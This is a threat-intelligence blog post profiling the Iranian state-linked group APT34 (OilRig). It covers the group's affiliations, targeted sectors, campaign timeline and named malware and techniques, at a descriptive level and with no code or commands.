January 29, 2025 8 Minute Read

This blog is the latest in a series that delves into the deep research conducted daily by the Trustwave SpiderLabs team on major threat actor groups currently operating globally.

APT34, also known as OilRig, Earth Simnavaz, and Helix Kitten, is a sophisticated, state-sponsored cyber threat group with suspected ties to Iran. Active since about 2012, the group has gained notoriety for targeting critical industries worldwide, including finance, energy, telecommunications, and government sectors, with a primary focus on the Middle East, according to a Trustwave SpiderLabs in-depth analysis of the group.

APT34: Origins and Ties to Iranian Cyber Operations

APT34 casts a very wide targeting net that includes the energy, financial, government, chemical, and telecommunications sectors, with a primary focus on the Middle East. The group was originally tracked as two separate entities, APT34 and OilRig, but it is believed the groups were consolidated due to overlapping activities observed in additional reporting.

APT34 is believed by multiple entities, including MITRE, to operate on behalf of the Iranian government, leveraging that nation's infrastructure with a targeting scheme that aligns with Iranian state interests.

The group often employs supply chain attacks, exploiting relationships between organizations to compromise their primary targets. Recently, APT34 has intensified its attacks on critical infrastructure in the Middle East, signaling a continued emphasis on exploiting vulnerabilities in these geopolitically sensitive regions. This escalation highlights its strategic focus on disrupting and exploiting infrastructure frameworks within its operational sphere.

APT34's Affiliated Groups

APT34 is associated with a very large number of Iranian-centric malicious groups. These include Iran's Ministry of Intelligence and Security (MOIS). Unlike the Islamic Revolutionary Guard Corps, also known as the Iranian Revolutionary Guards, which is integral to military data collection and analysis, the MOIS operates under the civil executive branch.

However, APT34 also works with other Iranian government-affiliated activity clusters, including Karkoff, Saitama, and IIS Group2. These groups share overlapping characteristics such as common C2 mechanisms, malware, and attack methodologies. They are also connected through malicious IIS modules and other attack artifacts.

Other related entities are Greenbug and Volatile Kitten, recognized as APT34's subgroups. The group has also been observed to overlap with APT33 (Elfin, Magnallium) and possibly, but unattributed, to campaigns like DNSpionage.

Further highlighting the interconnected nature of Iranian state-sponsored cyber operations, APT34's activities show similarities with the Hexane (aka Lyceum) cluster. Additionally, there is documented overlap between APT34 and FOX Kitten, another Iranian-linked group, which played a notable role in enabling ransomware attacks targeting organizations in the US and the Middle East.

In August, CISA issued an alert on FOX Kitten's activities, emphasizing its ability to facilitate more destructive operations.

Key Sectors Targeted by APT34

In line with its need to align with Iranian objectives to enhance national security, geopolitical influence, and other strategic interests, APT34 focuses on intelligence collection and conducting cyber operations aimed at espionage. To this end, the group targets organizations worldwide to obtain sensitive and strategic information. This motivation aligns with state-sponsored objectives.

APT34's Target List

As previously noted, APT34 has not shied away from attacking a wide range of targets, striking the aviation, defense, education, IT, oil and gas, and telecommunications sectors. All to obtain information needed by the Iranian government.

While the group primarily focuses its operations within the Middle East, the Persian Gulf region in particular, it also maintains a global footprint. This is accomplished through attacks on the United States, United Kingdom, China, Turkey, and various nations across the Middle East and North Africa.

This wide-ranging victimology underscores APT34's strategic objectives, focusing on sectors and regions that hold economic, geopolitical, or strategic value to their operations. The group's adaptability and expansive targeting reflect its role as a versatile and persistent threat actor in the global cyber landscape.

APT34's Targeting Timeline

2012

This Saudi Arabian campaign employed social engineering techniques, such as impersonating legitimate service providers who offer troubleshooting assistance. The primary tool used in these attacks was the Helminth backdoor, delivered through Excel macros or as standalone executables. Unit 42 named this ongoing operation "OilRig", characterized by its use of highly targeted phishing campaigns.

The attacks expanded beyond Saudi Arabia to include Qatar, Turkey, Israel, and even the US, as observed by Unit 42 in its follow-up analysis. In May 2016, FireEye tracked the use of unique scripts in attacks against Middle Eastern banks, marking the beginning of this campaign's evolution toward more specialized tools and tactics. FireEye labeled the group APT34.

The group further improved its capabilities by adding a new Trojan called ISMAgent, a variant of the ISMDoor Trojan, and another tool, ISMInjector, specifically designed to deploy the ISMAgent backdoor.

These developments and anti-analysis techniques incorporated into its tools signaled a ramping up of the group's cyber espionage activities and its efforts to remain undetected.

These innovations were accompanied by several reports detailing the targeting of Israeli IT vendors, financial institutions, and even government entities in multiple Middle Eastern countries.

Unit 42 reported that OilRig had used a new Trojan, OopsIE, to attack a Middle Eastern insurance agency and a financial institution. These attacks leveraged the ThreeDollars delivery document, previously identified in 2017.

Additionally, APT34 had begun using a new IIS backdoor named RGDoor, which was deployed on web servers of Middle Eastern government organizations. This increase in activity and tool variety suggested that APT34/OilRig was not only improving its existing infrastructure but was also targeting high-value governmental and financial organizations for information gathering.

At this time, significant leaks occurred in the group's operational security, and tools belonging to APT34 were shared on a Telegram channel by an individual using the pseudonym Lab Dookhtegan. This leak, which included malware and victim data, revealed how APT34 had been retooling and updating its arsenal.

This year, APT34 targeted Jordan's foreign ministry in a spear-phishing campaign, utilizing a new backdoor named Saitama. This attack involved spear-phishing emails containing malicious attachments to deliver APT34's payload. The group continued to employ advanced techniques, including DNS tunneling and stateful inspection, to maintain persistence and avoid detection.

Then, in mid-July, APT34 did something unique.

OilRig/APT34 returned to its bread-and-butter operations. Starting in February, it staged an eight-month-long intrusion against undisclosed government entities in the Middle East. During this compromise, the attackers stole files and passwords and, in one instance, installed a PowerShell backdoor called PowerExchange. This backdoor was used to monitor incoming emails from an Exchange Server, execute commands sent by the attackers via email, and surreptitiously forward results back to the attackers. Evidence suggested the attackers deployed backdoors and keyloggers on dozens of additional machines.

In addition to deploying malware, the attackers frequently used the publicly available network administration tool Plink to configure port-forwarding rules on compromised machines, enabling remote access via Remote Desktop Protocol (RDP).

In the following months, Check Point, in collaboration with Sygnia, tracked and responded to a new set of activities, assigning its own alias - Scarred Manticore - to APT34. In this instance, the group primarily targeted government and telecommunication sectors in the Middle East. Scarred Manticore continued to pursue high-profile organizations, leveraging access to systematically exfiltrate data using tailor-made tools.

In several attacks, the threat actor leveraged the LIONTAIL framework, which is a set of custom loaders and memory-resident shellcode payloads. LIONTAIL's implants utilized undocumented functionalities of the HTTP.sys driver to extract payloads from incoming HTTP traffic. Multiple observed variants of LIONTAIL-associated malware suggested that Scarred Manticore generates tailor-made implants for each compromised server, allowing the malicious activities to blend into and be undiscernible from legitimate network traffic.

Check Point Research discovered an elaborate cyberattack against Iraqi governmental networks. The installer used to deploy the malware bore the logo of the Iraqi General Secretariat of the Council of Ministers, while the domains of compromised servers were related to the Iraqi Prime Minister's Office and the Ministry of Foreign Affairs.

Additionally, Trend Micro researchers have documented under the Earth Simnavaz alias, actively targeting various undisclosed entities in the Middle East, deploying backdoors that leverage Microsoft Exchange servers for credential theft, and exploiting vulnerabilities like CVE-2024-30088 for privilege escalation. Earth Simnavaz employs a combination of customized .NET tools, PowerShell scripts, and IIS-based malware to allow its activity to blend in with normal network traffic and avoid traditional detection methods.

APT34's Tools and Techniques for Persistent Threats

APT34 utilizes a sophisticated and constantly evolving toolkit in its campaigns. These incorporate a range of custom-developed tools designed for stealth, persistence, and evasion.

These tools, often tailored for specific target environments, allow the group to maintain operational flexibility while remaining undetected in highly secured networks. Recent campaigns have demonstrated APT34's ability to exploit vulnerabilities such as CVE-2024-30088 for privilege escalation, enabling them to escalate its access within compromised networks.

The group also leveraged Microsoft Exchange servers for credentials theft, further enhancing its ability to move laterally within targeted environments.

To blend their malicious activity with normal network traffic and avoid traditional detection methods, APT34 relies on a mix of customized .NET tools, PowerShell scripts, and IIS-based malware. The group crafts these tools to operate with minimal footprints, making them difficult for conventional security solutions to identify.

A key characteristic of APT34's operations is its use of specialized, continuously refined C2 mechanisms. One notable method is deploying a custom DNS tunneling protocol that allows the group to exfiltrate data and maintain control over compromised systems while bypassing traditional network monitoring solutions.

Additionally, APT34 utilizes email-based C2 channels that leverage compromised accounts, further complicating detection efforts by blending their communications with legitimate activity. Its toolkit also includes various other malware and tools that have been used in various campaigns over the years.

The group has an arsenal of weapons at its disposal. In addition to the recently used STEALHOOK exfiltration tool, Veaty and Spearal malware families, and the presence of passive IIS backdoors and custom webshells, these include Alma Communicator, BONDUPDATER, certutil, Clayslide, DistTrack, DNSExfiltrator, DNSpionage, Dustman, Fox Pane, GoogleDrive RAT, and Helminth, among many others.

The variety of tools reflects APT34's capability to conduct a wide range of cyber-espionage operations, from reconnaissance and lateral movement to exfiltration and destruction.

APT34's operational flexibility, combined with highly customized and modular toolsets, allows it to adapt quickly to evolving network defenses and continuously refine its techniques for maintaining long-term persistence in high-value targets.

Overall, APT34's toolkit reflects a constantly evolving approach to cyber espionage, leveraging tools tailored for stealth, persistence, and evasion.

At the same time, since 2016, APT34 has exhibited some patterns. Almost each year, the group introduces a new set of lightweight, custom-built .NET and PowerShell backdoors that are rarely reused.

APT34 shows us that these criminal groups do not stop evolving with new TTPs. All organizations, specifically those in the energy, government, and finance sectors, must adopt proactive security measures to counteract evolving threats like APT34. Strengthening vulnerability management and threat intelligence can mitigate the risks posed by this persistent threat actor.